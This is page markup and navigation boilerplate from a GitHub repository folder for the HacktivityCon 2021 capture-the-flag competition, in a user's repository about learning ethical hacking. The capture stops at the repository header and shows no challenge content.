integrity="sha512-y0yuiXfWuIeCCcUBT1jacp25vWnFCJWgwLM5G1VM4tmCHdoQbiVjvW/vuSuEXUjtS8WwdioTD5hVv9UULiUlww==" type="application/javascript" data-module-id="./chunk-webgl-warp.js" data-src="https://github.githubassets.com/assets/chunk-webgl-warp-cb4cae89.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-3R5+VhOHwJbG+s7VKlj1HjwVKo/RPldgUh98Yed4XMlk1jH7LP20vRYmLUqnvVaZcgx9x9XdWmQWKaBRQfsVvg==" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-dd1e7e56.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-tfzZxJCbul4TLTQmD9EJzuvXoLZGUCnWTiuJCGnXlaABfL2eD0I/J/IL9blT+JbF1dQvKi1g/E7396zAKdrZTA==" type="application/javascript" src="https://github.githubassets.com/assets/repositories-b5fcd9c4.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-CfJc9iAnfLJnxnvSY41oW/N+iuVSia2CCj/v47XVliM9ACQPKur94EPHnokX0RG8e+FPMhJ2CGy9FfqLYZi4Dg==" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-09f25cf6.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-Y9QCffkHDk3/KAoYUMhKeokbNlXWgpO+53XrccRwhUWzMTxEmhnp1ce7OVWP3vOzhCfWaxxnKWW9eVjjny8nRA==" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-63d4027d.js"></script>
<meta name="viewport" content="width=device-width"> <title>Capture-the-Flag/competitions/hacktivitycon21 at master · Kartibok/Capture-the-Flag · GitHub</title> <meta name="description" content="This is my journey into CTF, from my introduction into ethical hacking, covering the tools and competitions that I now engage with and thoroughly enjoy. - Capture-the-Flag/competitions/hacktivitycon21 at master · Kartibok/Capture-the-Flag"> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/c61f9692ac6e8e6f3bc0c60f6cf3e358e8e3017aa01d67823ec133534e1643a6/Kartibok/Capture-the-Flag" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="Capture-the-Flag/competitions/hacktivitycon21 at master · Kartibok/Capture-the-Flag" /><meta name="twitter:description" content="This is my journey into CTF, from my introduction into ethical hacking, covering the tools and competitions that I now engage with and thoroughly enjoy. - Capture-the-Flag/competitions/hacktivityco..." /> <meta property="og:image" content="https://opengraph.githubassets.com/c61f9692ac6e8e6f3bc0c60f6cf3e358e8e3017aa01d67823ec133534e1643a6/Kartibok/Capture-the-Flag" /><meta property="og:image:alt" content="This is my journey into CTF, from my introduction into ethical hacking, covering the tools and competitions that I now engage with and thoroughly enjoy. - Capture-the-Flag/competitions/hacktivityco..." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="Capture-the-Flag/competitions/hacktivitycon21 at master · Kartibok/Capture-the-Flag" /><meta property="og:url" content="https://github.com/Kartibok/Capture-the-Flag" /><meta property="og:description" content="This is my journey into CTF, from my introduction into ethical hacking, covering the tools and competitions that I now engage with and thoroughly enjoy. - Capture-the-Flag/competitions/hacktivityco..." />
<link rel="assets" href="https://github.githubassets.com/">
<meta name="request-id" content="DDD9:8944:14B082E:15F1FC5:6182FF5E" data-pjax-transient="true"/><meta name="html-safe-nonce" content="d88efbc64db5365c54ad12636171a6a4a7ef4d574c9edffc387be9a3f3902902" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJEREQ5Ojg5NDQ6MTRCMDgyRToxNUYxRkM1OjYxODJGRjVFIiwidmlzaXRvcl9pZCI6IjUxMjQ5NDEzNzIyMTM4ODY4MTQiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="01ae9b260b91b827f0676d2e93168f7fc53f145ab69d64ba8c1e6af84d21200d" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:272475571" data-pjax-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code" data-pjax-transient="true" />
<meta name="selected-link" value="repo_source" data-pjax-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc">
<meta name="octolytics-url" content="https://collector.githubapp.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-pjax-transient="true" />
<meta name="hostname" content="github.com"> <meta name="user-login" content="">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="MARKETPLACE_PENDING_INSTALLATIONS,FILE_UPLOAD_CURSOR_POSITION">
<meta http-equiv="x-pjax-version" content="89408a5ac57f5b71ed7ebb466b241a52be13289bf52f5580353d1ab3681a2237"> <meta http-equiv="x-pjax-csp-version" content="9ea82e8060ac9d44365bfa193918b70ed58abd9413362ba412abb161b3a8d1b6"> <meta http-equiv="x-pjax-css-version" content="8c75751aad52ee8322f8435d51506c1b59a636003602b767a0b479bddfe5cb22"> <meta http-equiv="x-pjax-js-version" content="3cad26b543586e12a4ad3073df6bdffcfe52ab9dafecfd0ffc60594d519fb9b5">
<meta name="go-import" content="github.com/Kartibok/Capture-the-Flag git https://github.com/Kartibok/Capture-the-Flag.git">
<meta name="octolytics-dimension-user_id" content="57687816" /><meta name="octolytics-dimension-user_login" content="Kartibok" /><meta name="octolytics-dimension-repository_id" content="272475571" /><meta name="octolytics-dimension-repository_nwo" content="Kartibok/Capture-the-Flag" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="272475571" /><meta name="octolytics-dimension-repository_network_root_nwo" content="Kartibok/Capture-the-Flag" />
<link rel="canonical" href="https://github.com/Kartibok/Capture-the-Flag/tree/master/competitions/hacktivitycon21" data-pjax-transient>
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<header class="Header-old header-logged-out js-details-container Details position-relative f4 py-2" role="banner"> <div class="container-xl d-lg-flex flex-items-center p-responsive"> <div class="d-flex flex-justify-between flex-items-center"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github color-text-white"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg>
<div class="d-lg-none css-truncate css-truncate-target width-fit p-2">
</div>
<div class="d-flex flex-items-center"> Sign up
<button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link d-lg-none mt-1"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-three-bars color-text-white"> <path fill-rule="evenodd" d="M1 2.75A.75.75 0 011.75 2h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 2.75zm0 5A.75.75 0 011.75 7h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 7.75zM1.75 12a.75.75 0 100 1.5h12.5a.75.75 0 100-1.5H1.75z"></path></svg>
</button> </div> </div>
<div class="HeaderMenu HeaderMenu--logged-out position-fixed top-0 right-0 bottom-0 height-fit position-lg-relative d-lg-flex flex-justify-between flex-items-center flex-auto"> <div class="d-flex d-lg-none flex-justify-end border-bottom color-bg-subtle p-3"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-x color-icon-secondary"> <path fill-rule="evenodd" d="M5.72 5.72a.75.75 0 011.06 0L12 10.94l5.22-5.22a.75.75 0 111.06 1.06L13.06 12l5.22 5.22a.75.75 0 11-1.06 1.06L12 13.06l-5.22 5.22a.75.75 0 01-1.06-1.06L10.94 12 5.72 6.78a.75.75 0 010-1.06z"></path></svg>
</button> </div>
<nav class="mt-0 px-3 px-lg-0 mb-5 mb-lg-0" aria-label="Global"> <details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Why GitHub? <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary> <div class="dropdown-menu flex-auto rounded px-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Features <span>→</span>
Mobile <span>→</span> Actions <span>→</span> Codespaces <span>→</span> Packages <span>→</span> Security <span>→</span> Code review <span>→</span> Issues <span>→</span> Integrations <span>→</span>
GitHub Sponsors <span>→</span> Customer stories<span>→</span> </div> </details> Team Enterprise
<details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Explore <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary>
<div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Explore GitHub <span>→</span>
<h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Learn and contribute</h4> Topics <span>→</span> Collections <span>→</span> Trending <span>→</span> Learning Lab <span>→</span> Open source guides <span>→</span>
<h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Connect with others</h4> The ReadME Project <span>→</span> Events <span>→</span> Community forum <span>→</span> GitHub Education <span>→</span> GitHub Stars program <span>→</span> </div> </details>
Marketplace
<details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Pricing <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary>
<div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-4 mt-0 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Plans <span>→</span>
Compare plans <span>→</span> Contact Sales <span>→</span>
Education <span>→</span> </div> </details> </nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-3 mb-lg-0">
<div class="header-search flex-auto js-site-search position-relative flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="272475571" data-scoped-search-url="/Kartibok/Capture-the-Flag/search" data-owner-scoped-search-url="/users/Kartibok/search" data-unscoped-search-url="/search" action="/Kartibok/Capture-the-Flag/search" accept-charset="UTF-8" method="get"> <label class="form-control input-sm header-search-wrapper p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control input-sm header-search-input jump-to-field js-jump-to-field js-site-search-focus js-site-search-field is-clearable" data-hotkey=s,/ name="q" data-test-selector="nav-search-input" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="O7t56YJkzK2XZDT3wN8Vba8crsOnZnyDdWvfVamlAk02oDV9qLkBs5vGKLRieu0Y87Tvx1XCU5fMO1KT+qZ+pQ==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-3 mb-4 mb-lg-0 d-inline-block"> Sign in </div>
Sign up </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div data-pjax-replace id="js-flash-container">
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class=" px-2" > <button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div>{{ message }}</div>
</div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" data-pjax-container >
<div id="repository-container-header" class="pt-3 hide-full-screen mb-5" style="background-color: var(--color-page-header-bg);" data-pjax-replace>
<div class="d-flex mb-3 px-3 px-md-4 px-lg-5">
<div class="flex-auto min-width-0 width-fit mr-3"> <h1 class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-icon-secondary mr-2"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <span> Kartibok </span> <span>/</span> Capture-the-Flag
<span></span><span>Public</span></h1>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell"> <path d="M8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path><path fill-rule="evenodd" d="M8 1.5A3.5 3.5 0 004.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01l.001.006c0 .002.002.004.004.006a.017.017 0 00.006.004l.007.001h10.964l.007-.001a.016.016 0 00.006-.004.016.016 0 00.004-.006l.001-.007a.017.017 0 00-.003-.01l-1.703-2.554a1.75 1.75 0 01-.294-.97V5A3.5 3.5 0 008 1.5zM3 5a5 5 0 0110 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.518 1.518 0 0113.482 13H2.518a1.518 1.518 0 01-1.263-2.36l1.703-2.554A.25.25 0 003 7.947V5z"></path></svg> Notifications
<div > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom mr-1"> <path fill-rule="evenodd" d="M8 .25a.75.75 0 01.673.418l1.882 3.815 4.21.612a.75.75 0 01.416 1.279l-3.046 2.97.719 4.192a.75.75 0 01-1.088.791L8 12.347l-3.766 1.98a.75.75 0 01-1.088-.79l.72-4.194L.818 6.374a.75.75 0 01.416-1.28l4.21-.611L7.327.668A.75.75 0 018 .25zm0 2.445L6.615 5.5a.75.75 0 01-.564.41l-3.097.45 2.24 2.184a.75.75 0 01.216.664l-.528 3.084 2.769-1.456a.75.75 0 01.698 0l2.77 1.456-.53-3.084a.75.75 0 01.216-.664l2.24-2.183-3.096-.45a.75.75 0 01-.564-.41L8 2.694v.001z"></path></svg> <span> Star</span>
9 </div>
